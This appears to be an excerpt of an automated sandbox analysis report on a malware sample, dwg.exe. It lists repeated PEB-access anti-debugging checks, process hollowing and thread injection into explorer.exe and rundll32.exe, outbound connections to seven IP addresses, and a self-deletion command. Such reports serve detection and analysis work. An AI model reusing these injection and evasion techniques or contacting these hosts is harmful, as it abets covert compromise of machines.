      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]13_2_044D1C06
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]13_2_044D1C06
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]13_2_044D1C06
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]13_2_044D1C06
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]13_2_044D1C06
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]13_2_044D1C06
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]13_2_044D1C06
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]13_2_044D1C06
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]13_2_044D1C06
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444BC2C mov eax, dword ptr fs:[00000030h]13_2_0444BC2C
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E8CD6 mov eax, dword ptr fs:[00000030h]13_2_044E8CD6
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D14FB mov eax, dword ptr fs:[00000030h]13_2_044D14FB
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04496CF0 mov eax, dword ptr fs:[00000030h]13_2_04496CF0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04496CF0 mov eax, dword ptr fs:[00000030h]13_2_04496CF0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04496CF0 mov eax, dword ptr fs:[00000030h]13_2_04496CF0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0442849B mov eax, dword ptr fs:[00000030h]13_2_0442849B
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04453D43 mov eax, dword ptr fs:[00000030h]13_2_04453D43
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04493540 mov eax, dword ptr fs:[00000030h]13_2_04493540
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044C3D40 mov eax, dword ptr fs:[00000030h]13_2_044C3D40
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04437D50 mov eax, dword ptr fs:[00000030h]13_2_04437D50
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443C577 mov eax, dword ptr fs:[00000030h]13_2_0443C577
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443C577 mov eax, dword ptr fs:[00000030h]13_2_0443C577
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0441AD30 mov eax, dword ptr fs:[00000030h]13_2_0441AD30
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044DE539 mov eax, dword ptr fs:[00000030h]13_2_044DE539
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04423D34 mov eax, dword ptr fs:[00000030h]13_2_04423D34
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04423D34 mov eax, dword ptr fs:[00000030h]13_2_04423D34
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04423D34 mov eax, dword ptr fs:[00000030h]13_2_04423D34
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04423D34 mov eax, dword ptr fs:[00000030h]13_2_04423D34
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04423D34 mov eax, dword ptr fs:[00000030h]13_2_04423D34
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04423D34 mov eax, dword ptr fs:[00000030h]13_2_04423D34
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04423D34 mov eax, dword ptr fs:[00000030h]13_2_04423D34
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04423D34 mov eax, dword ptr fs:[00000030h]13_2_04423D34
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04423D34 mov eax, dword ptr fs:[00000030h]13_2_04423D34
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04423D34 mov eax, dword ptr fs:[00000030h]13_2_04423D34
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04423D34 mov eax, dword ptr fs:[00000030h]13_2_04423D34
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04423D34 mov eax, dword ptr fs:[00000030h]13_2_04423D34
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04423D34 mov eax, dword ptr fs:[00000030h]13_2_04423D34
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E8D34 mov eax, dword ptr fs:[00000030h]13_2_044E8D34
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0449A537 mov eax, dword ptr fs:[00000030h]13_2_0449A537
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04444D3B mov eax, dword ptr fs:[00000030h]13_2_04444D3B
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04444D3B mov eax, dword ptr fs:[00000030h]13_2_04444D3B
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04444D3B mov eax, dword ptr fs:[00000030h]13_2_04444D3B
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04496DC9 mov eax, dword ptr fs:[00000030h]13_2_04496DC9
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04496DC9 mov eax, dword ptr fs:[00000030h]13_2_04496DC9
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04496DC9 mov eax, dword ptr fs:[00000030h]13_2_04496DC9
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04496DC9 mov ecx, dword ptr fs:[00000030h]13_2_04496DC9
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04496DC9 mov eax, dword ptr fs:[00000030h]13_2_04496DC9
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04496DC9 mov eax, dword ptr fs:[00000030h]13_2_04496DC9
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0442D5E0 mov eax, dword ptr fs:[00000030h]13_2_0442D5E0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0442D5E0 mov eax, dword ptr fs:[00000030h]13_2_0442D5E0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044DFDE2 mov eax, dword ptr fs:[00000030h]13_2_044DFDE2
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044DFDE2 mov eax, dword ptr fs:[00000030h]13_2_044DFDE2
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044DFDE2 mov eax, dword ptr fs:[00000030h]13_2_044DFDE2
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044DFDE2 mov eax, dword ptr fs:[00000030h]13_2_044DFDE2
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044C8DF1 mov eax, dword ptr fs:[00000030h]13_2_044C8DF1
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04442581 mov eax, dword ptr fs:[00000030h]13_2_04442581
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04442581 mov eax, dword ptr fs:[00000030h]13_2_04442581
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04442581 mov eax, dword ptr fs:[00000030h]13_2_04442581
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04442581 mov eax, dword ptr fs:[00000030h]13_2_04442581
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04412D8A mov eax, dword ptr fs:[00000030h]13_2_04412D8A
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04412D8A mov eax, dword ptr fs:[00000030h]13_2_04412D8A
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04412D8A mov eax, dword ptr fs:[00000030h]13_2_04412D8A
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04412D8A mov eax, dword ptr fs:[00000030h]13_2_04412D8A
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04412D8A mov eax, dword ptr fs:[00000030h]13_2_04412D8A
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444FD9B mov eax, dword ptr fs:[00000030h]13_2_0444FD9B
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444FD9B mov eax, dword ptr fs:[00000030h]13_2_0444FD9B
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E05AC mov eax, dword ptr fs:[00000030h]13_2_044E05AC
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E05AC mov eax, dword ptr fs:[00000030h]13_2_044E05AC
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044435A1 mov eax, dword ptr fs:[00000030h]13_2_044435A1
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04441DB5 mov eax, dword ptr fs:[00000030h]13_2_04441DB5
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04441DB5 mov eax, dword ptr fs:[00000030h]13_2_04441DB5
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04441DB5 mov eax, dword ptr fs:[00000030h]13_2_04441DB5
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04427E41 mov eax, dword ptr fs:[00000030h]13_2_04427E41
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04427E41 mov eax, dword ptr fs:[00000030h]13_2_04427E41
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04427E41 mov eax, dword ptr fs:[00000030h]13_2_04427E41
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04427E41 mov eax, dword ptr fs:[00000030h]13_2_04427E41
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04427E41 mov eax, dword ptr fs:[00000030h]13_2_04427E41
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04427E41 mov eax, dword ptr fs:[00000030h]13_2_04427E41
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044DAE44 mov eax, dword ptr fs:[00000030h]13_2_044DAE44
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044DAE44 mov eax, dword ptr fs:[00000030h]13_2_044DAE44
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0442766D mov eax, dword ptr fs:[00000030h]13_2_0442766D
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443AE73 mov eax, dword ptr fs:[00000030h]13_2_0443AE73
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443AE73 mov eax, dword ptr fs:[00000030h]13_2_0443AE73
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443AE73 mov eax, dword ptr fs:[00000030h]13_2_0443AE73
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443AE73 mov eax, dword ptr fs:[00000030h]13_2_0443AE73
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443AE73 mov eax, dword ptr fs:[00000030h]13_2_0443AE73
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0441C600 mov eax, dword ptr fs:[00000030h]13_2_0441C600
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0441C600 mov eax, dword ptr fs:[00000030h]13_2_0441C600
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0441C600 mov eax, dword ptr fs:[00000030h]13_2_0441C600
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04448E00 mov eax, dword ptr fs:[00000030h]13_2_04448E00
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1608 mov eax, dword ptr fs:[00000030h]13_2_044D1608
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444A61C mov eax, dword ptr fs:[00000030h]13_2_0444A61C
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444A61C mov eax, dword ptr fs:[00000030h]13_2_0444A61C
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0441E620 mov eax, dword ptr fs:[00000030h]13_2_0441E620
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044CFE3F mov eax, dword ptr fs:[00000030h]13_2_044CFE3F
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04458EC7 mov eax, dword ptr fs:[00000030h]13_2_04458EC7
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044436CC mov eax, dword ptr fs:[00000030h]13_2_044436CC
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044CFEC0 mov eax, dword ptr fs:[00000030h]13_2_044CFEC0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E8ED6 mov eax, dword ptr fs:[00000030h]13_2_044E8ED6
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044276E2 mov eax, dword ptr fs:[00000030h]13_2_044276E2
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044416E0 mov ecx, dword ptr fs:[00000030h]13_2_044416E0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044AFE87 mov eax, dword ptr fs:[00000030h]13_2_044AFE87
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E0EA5 mov eax, dword ptr fs:[00000030h]13_2_044E0EA5
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E0EA5 mov eax, dword ptr fs:[00000030h]13_2_044E0EA5
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E0EA5 mov eax, dword ptr fs:[00000030h]13_2_044E0EA5
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044946A7 mov eax, dword ptr fs:[00000030h]13_2_044946A7
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0442EF40 mov eax, dword ptr fs:[00000030h]13_2_0442EF40
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0442FF60 mov eax, dword ptr fs:[00000030h]13_2_0442FF60
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E8F6A mov eax, dword ptr fs:[00000030h]13_2_044E8F6A
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E070D mov eax, dword ptr fs:[00000030h]13_2_044E070D
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E070D mov eax, dword ptr fs:[00000030h]13_2_044E070D
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444A70E mov eax, dword ptr fs:[00000030h]13_2_0444A70E
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444A70E mov eax, dword ptr fs:[00000030h]13_2_0444A70E
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443F716 mov eax, dword ptr fs:[00000030h]13_2_0443F716
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044AFF10 mov eax, dword ptr fs:[00000030h]13_2_044AFF10
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044AFF10 mov eax, dword ptr fs:[00000030h]13_2_044AFF10
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04414F2E mov eax, dword ptr fs:[00000030h]13_2_04414F2E
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04414F2E mov eax, dword ptr fs:[00000030h]13_2_04414F2E
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444E730 mov eax, dword ptr fs:[00000030h]13_2_0444E730
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044537F5 mov eax, dword ptr fs:[00000030h]13_2_044537F5
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04428794 mov eax, dword ptr fs:[00000030h]13_2_04428794
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04497794 mov eax, dword ptr fs:[00000030h]13_2_04497794
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04497794 mov eax, dword ptr fs:[00000030h]13_2_04497794
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04497794 mov eax, dword ptr fs:[00000030h]13_2_04497794
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04430050 mov eax, dword ptr fs:[00000030h]13_2_04430050
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04430050 mov eax, dword ptr fs:[00000030h]13_2_04430050
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E1074 mov eax, dword ptr fs:[00000030h]13_2_044E1074
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D2073 mov eax, dword ptr fs:[00000030h]13_2_044D2073
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E4015 mov eax, dword ptr fs:[00000030h]13_2_044E4015
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E4015 mov eax, dword ptr fs:[00000030h]13_2_044E4015
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04497016 mov eax, dword ptr fs:[00000030h]13_2_04497016
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04497016 mov eax, dword ptr fs:[00000030h]13_2_04497016
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04497016 mov eax, dword ptr fs:[00000030h]13_2_04497016
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0442B02A mov eax, dword ptr fs:[00000030h]13_2_0442B02A
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0442B02A mov eax, dword ptr fs:[00000030h]13_2_0442B02A
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0442B02A mov eax, dword ptr fs:[00000030h]13_2_0442B02A
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0442B02A mov eax, dword ptr fs:[00000030h]13_2_0442B02A
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444002D mov eax, dword ptr fs:[00000030h]13_2_0444002D
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444002D mov eax, dword ptr fs:[00000030h]13_2_0444002D
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444002D mov eax, dword ptr fs:[00000030h]13_2_0444002D
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444002D mov eax, dword ptr fs:[00000030h]13_2_0444002D
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444002D mov eax, dword ptr fs:[00000030h]13_2_0444002D
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443A830 mov eax, dword ptr fs:[00000030h]13_2_0443A830
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443A830 mov eax, dword ptr fs:[00000030h]13_2_0443A830
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443A830 mov eax, dword ptr fs:[00000030h]13_2_0443A830
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443A830 mov eax, dword ptr fs:[00000030h]13_2_0443A830
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044AB8D0 mov eax, dword ptr fs:[00000030h]13_2_044AB8D0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044AB8D0 mov ecx, dword ptr fs:[00000030h]13_2_044AB8D0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044AB8D0 mov eax, dword ptr fs:[00000030h]13_2_044AB8D0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044AB8D0 mov eax, dword ptr fs:[00000030h]13_2_044AB8D0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044AB8D0 mov eax, dword ptr fs:[00000030h]13_2_044AB8D0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044AB8D0 mov eax, dword ptr fs:[00000030h]13_2_044AB8D0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044140E1 mov eax, dword ptr fs:[00000030h]13_2_044140E1
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044140E1 mov eax, dword ptr fs:[00000030h]13_2_044140E1
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044140E1 mov eax, dword ptr fs:[00000030h]13_2_044140E1
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044158EC mov eax, dword ptr fs:[00000030h]13_2_044158EC
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04419080 mov eax, dword ptr fs:[00000030h]13_2_04419080
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04493884 mov eax, dword ptr fs:[00000030h]13_2_04493884
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04493884 mov eax, dword ptr fs:[00000030h]13_2_04493884
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044420A0 mov eax, dword ptr fs:[00000030h]13_2_044420A0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044420A0 mov eax, dword ptr fs:[00000030h]13_2_044420A0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044420A0 mov eax, dword ptr fs:[00000030h]13_2_044420A0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044420A0 mov eax, dword ptr fs:[00000030h]13_2_044420A0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044420A0 mov eax, dword ptr fs:[00000030h]13_2_044420A0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044420A0 mov eax, dword ptr fs:[00000030h]13_2_044420A0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044590AF mov eax, dword ptr fs:[00000030h]13_2_044590AF
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444F0BF mov ecx, dword ptr fs:[00000030h]13_2_0444F0BF
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444F0BF mov eax, dword ptr fs:[00000030h]13_2_0444F0BF
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444F0BF mov eax, dword ptr fs:[00000030h]13_2_0444F0BF
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443B944 mov eax, dword ptr fs:[00000030h]13_2_0443B944
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443B944 mov eax, dword ptr fs:[00000030h]13_2_0443B944
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0441C962 mov eax, dword ptr fs:[00000030h]13_2_0441C962
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0441B171 mov eax, dword ptr fs:[00000030h]13_2_0441B171
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0441B171 mov eax, dword ptr fs:[00000030h]13_2_0441B171
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04419100 mov eax, dword ptr fs:[00000030h]13_2_04419100
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04419100 mov eax, dword ptr fs:[00000030h]13_2_04419100
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04419100 mov eax, dword ptr fs:[00000030h]13_2_04419100
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04434120 mov eax, dword ptr fs:[00000030h]13_2_04434120
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04434120 mov eax, dword ptr fs:[00000030h]13_2_04434120
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04434120 mov eax, dword ptr fs:[00000030h]13_2_04434120
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04434120 mov eax, dword ptr fs:[00000030h]13_2_04434120
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04434120 mov ecx, dword ptr fs:[00000030h]13_2_04434120
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444513A mov eax, dword ptr fs:[00000030h]13_2_0444513A
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444513A mov eax, dword ptr fs:[00000030h]13_2_0444513A
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0441B1E1 mov eax, dword ptr fs:[00000030h]13_2_0441B1E1
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0441B1E1 mov eax, dword ptr fs:[00000030h]13_2_0441B1E1
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0441B1E1 mov eax, dword ptr fs:[00000030h]13_2_0441B1E1
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044A41E8 mov eax, dword ptr fs:[00000030h]13_2_044A41E8
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443C182 mov eax, dword ptr fs:[00000030h]13_2_0443C182
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444A185 mov eax, dword ptr fs:[00000030h]13_2_0444A185
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04442990 mov eax, dword ptr fs:[00000030h]13_2_04442990
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044461A0 mov eax, dword ptr fs:[00000030h]13_2_044461A0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044461A0 mov eax, dword ptr fs:[00000030h]13_2_044461A0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D49A4 mov eax, dword ptr fs:[00000030h]13_2_044D49A4
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D49A4 mov eax, dword ptr fs:[00000030h]13_2_044D49A4
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D49A4 mov eax, dword ptr fs:[00000030h]13_2_044D49A4
      Source: C:\Users\user\Desktop\dwg.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 94.136.40.51 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.25 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 146.148.189.216 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 104.21.56.93 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 47.110.53.154 80Jump to behavior
      Maps a DLL or memory area into another processShow sources
      Source: C:\Users\user\Desktop\dwg.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\dwg.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\dwg.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Modifies the context of a thread in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\dwg.exeThread register set: target process: 3472Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 3472Jump to behavior
      Queues an APC in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\dwg.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
      Sample uses process hollowing techniqueShow sources
      Source: C:\Users\user\Desktop\dwg.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: A90000Jump to behavior
      Source: C:\Users\user\Desktop\dwg.exeProcess created: C:\Users\user\Desktop\dwg.exe 'C:\Users\user\Desktop\dwg.exe' Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\dwg.exe'Jump to behavior
      Source: explorer.exe, 00000004.00000000.284110577.0000000005EA0000.00000004.00000001.sdmp, rundll32.exe, 0000000D.00000002.491840148.0000000002CB0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000004.00000000.273711682.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.491840148.0000000002CB0000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000004.00000000.273711682.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.491840148.0000000002CB0000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
      Source: explorer.exe, 00000004.00000000.273519346.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
      Source: explorer.exe, 00000004.00000000.273711682.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.491840148.0000000002CB0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
